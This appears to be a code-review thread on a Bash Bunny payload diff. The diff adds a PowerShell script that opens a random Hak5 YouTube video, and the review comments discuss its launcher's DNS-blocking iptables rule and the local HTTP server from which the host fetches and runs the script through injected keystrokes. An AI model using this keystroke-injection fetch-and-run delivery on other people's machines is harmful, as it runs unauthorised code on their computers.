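Review bot: The `iptables -A OUTPUT -p udp --dport 53 -j DROP` rule is appended on every run and nothing removes it, so each replug adds another copy and outbound DNS on the Bunny stays blocked for the rest of the session even though the comment says it is only needed so the server starts immediately; once the `while ! nc -z localhost 80` loop has confirmed the listener is up, delete it again with `iptables -D OUTPUT -p udp --dport 53 -j DROP`. The background `python -m SimpleHTTPServer 80 &` is likewise never stopped, but it cannot simply be killed right after `RUN WIN` because the host still has to fetch `s` from it, so any cleanup of the server needs a wait of its own first. Separately, `cd /root/udisk/payloads/$SWITCH_POSITION/` should quote the expansion and fail loudly, `cd "/root/udisk/payloads/$SWITCH_POSITION/" || exit 1`, since everything after it assumes the working directory holds `s`.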
diff --git a/payloads/library/general/Win_PoSH_RandomVid/s b/payloads/library/general/Win_PoSH_RandomVid/s
new file mode 100644
index 00000000..20ddb97b
--- /dev/null
+++ b/payloads/library/general/Win_PoSH_RandomVid/s
@@ -0,0 +1,24 @@
+# Get the RSS feed for the Hak5 Channel
+Write-Output "Connecting to youtube"
+$Response = Invoke-WebRequest -Uri "https://www.youtube.com/feeds/videos.xml?channel_id=UC3s0BtrBJpwNDaflRSoiieQ" -UseBasicParsing -ContentType "application/xml"
+Write-Output $Response.StatusCode
+# See if it successful
+If ($Response.StatusCode -eq "200") {
+ # set the XML
+ $Xml = [xml]$Response.Content
+ $Entries = @()
+ # Loop each entry creating an object
+ ForEach ($Entry in $Xml.feed.entry) {
+ $Entries += [PSCustomObject] @{
+ 'Updated' = [datetime]$Entry.updated
+ 'Title' = $Entry.title
+ 'Link' = $Entry.Link.href
+ }
+ }
+ # Gets a random number
+ $int = (Get-Random -Maximum ($Entries.Count -1) -Minimum 0)
+ $Entry = $Entries[$int]
+ # Opens link
+ Start-Process $Entry.Link
+ Write-Output $Entry.Title
+}
\ No newline at end of file
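Review bot: `Get-Random -Maximum ($Entries.Count -1) -Minimum 0` can never return the last index, because `-Maximum` is already exclusive in Get-Random, so the final entry of the feed is never opened, and with a single-entry feed the call throws because Maximum (0) is not greater than Minimum (0); use `$int = Get-Random -Maximum $Entries.Count -Minimum 0` after checking `$Entries.Count -gt 0`. The `If ($Response.StatusCode -eq "200")` test is also largely dead: Invoke-WebRequest in Windows PowerShell 5.1 raises a terminating error for non-success status codes and for connection failures instead of returning a response, so failure handling belongs in a `try`/`catch` around the request. `-ContentType "application/xml"` only sets a request header on this GET and has no effect on how the response is parsed, so it can be dropped.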